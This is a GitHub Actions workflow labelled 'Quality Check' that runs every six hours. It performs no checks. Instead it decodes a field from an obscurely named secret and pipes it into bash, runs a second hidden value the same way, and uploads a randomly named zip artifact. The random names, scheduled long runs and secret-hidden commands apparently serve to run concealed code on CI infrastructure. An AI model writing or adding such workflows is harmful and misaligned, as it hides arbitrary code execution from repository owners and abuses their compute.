name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '37 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          sifg3: ${{ secrets.sifg3 }}
        run: |
          printf '%s' "$sifg3" | jq -r .rl20 | /bin/bash
          echo $ddhay707 | jq -r .ahx842 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: EE66GxjL
          path: "*.zip"
          retention-days: 1
